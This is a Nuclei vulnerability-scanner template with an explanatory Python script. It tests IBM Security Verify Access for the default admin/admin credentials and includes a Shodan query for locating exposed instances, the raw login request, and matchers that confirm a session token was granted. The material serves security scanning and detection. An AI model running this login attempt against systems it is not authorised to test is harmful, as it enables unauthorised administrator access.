Vulnerability Description
IBM Security Verify Access default admin credentials were discovered. An unauthenticated, remote attacker can exploit this to gain privileged or administrator access to the system.
id: ibm-security-verify-default-login

info:
  name: IBM Security Verify Access - Default Login
  author: johnk3r
  severity: high
  description: |
    IBM Security Verify Access default admin credentials were discovered. An unauthenticated, remote attacker can exploit this to gain privileged or administrator access to the system.
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cwe-id: CWE-522
  metadata:
    verified: true
    max-request: 2
    shodan-query: title:"IBM Security Verify Access"
  tags: ibm,default-login,vuln

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /core/j_security_check HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        j_username={{username}}&j_password={{password}}&commit=&locale=en&_method=PUT

    attack: pitchfork
    payloads:
      username:
        - admin
      password:
        - admin

    matchers:
      - type: dsl
        dsl:
          - "len(body) == 0"
          - "status_code == 302"
          - "contains(set_cookie, 'LtpaToken2')"
        condition: and
# digest: 4a0a00473045022014f656da3cb74d5d1beba2f618e1e7c8ee04615dfda27107f0ed9a5a270ad43d02210090e034d695d1e01b179ea22ed93a32a610a4d23738ba73e182bf7ce5bc814ecd:922c64590222798bb761d5b6d8e72950
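As an added example (not part of the template above and not nuclei project code), the following Python script reproduces two things the template relies on: how `attack: pitchfork` pairs the payload lists positionally (which is why `max-request` is 2, one GET plus a single POST), and how the three DSL matchers combined with `condition: and` judge a response. The HTTP responses are constructed samples, no network access is made, and the joining of Set-Cookie headers into one `set_cookie` string is an assumption approximating nuclei's variable. The same signals (a 302 with an empty body that sets `LtpaToken2` on `/core/j_security_check`) are what a defender would look for in reverse-proxy or WAF logs when checking whether default credentials are still accepted.

```python
"""Added example: payload pairing and DSL matcher logic of the template above.
Responses below are constructed samples, not captured from any real system."""
from itertools import product


def pitchfork(payloads: dict) -> list[dict]:
    """Nuclei 'pitchfork' mode: payload lists are zipped positionally,
    so a 1x1 payload set yields exactly one login request."""
    names = list(payloads)
    return [dict(zip(names, combo)) for combo in zip(*(payloads[n] for n in names))]


def clusterbomb(payloads: dict) -> list[dict]:
    """For contrast, 'clusterbomb' mode takes the cartesian product."""
    names = list(payloads)
    return [dict(zip(names, combo)) for combo in product(*(payloads[n] for n in names))]


def parse_response(raw: bytes) -> tuple[int, str, bytes]:
    """Split a raw HTTP/1.1 response into status code, Set-Cookie values and body.
    Assumption: multiple Set-Cookie headers are joined with '; ' to mimic set_cookie."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    status_code = int(lines[0].split()[1])
    cookies = [ln.split(":", 1)[1].strip()
               for ln in lines[1:] if ln.lower().startswith("set-cookie:")]
    return status_code, "; ".join(cookies), body


def template_matches(raw: bytes) -> bool:
    """Evaluate the template's three DSL conditions under condition: and."""
    status_code, set_cookie, body = parse_response(raw)
    return len(body) == 0 and status_code == 302 and "LtpaToken2" in set_cookie


# Constructed sample responses (placeholder token value, not a real session).
LOGIN_OK = (b"HTTP/1.1 302 Found\r\nLocation: /core/\r\n"
            b"Set-Cookie: LtpaToken2=SAMPLE-PLACEHOLDER; Path=/; HttpOnly\r\n\r\n")
LOGIN_FAIL = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
              b"<html>Login failed</html>")

if __name__ == "__main__":
    print(len(pitchfork({"username": ["admin"], "password": ["admin"]})))  # 1
    print(template_matches(LOGIN_OK), template_matches(LOGIN_FAIL))  # True False
```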